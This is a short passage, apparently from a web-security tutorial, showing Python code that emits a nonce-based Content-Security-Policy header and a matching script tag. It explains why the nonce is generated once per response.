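    print("Content-Security-Policy:", strict_csp(nonce, "csp-endpoint"))
    print(f'<script nonce="{nonce}" src="/static/app.js"></script>')
```

The same nonce value has to be written into every script tag the page legitimately includes, which is why it is generated once per response and passed to both the header and the template.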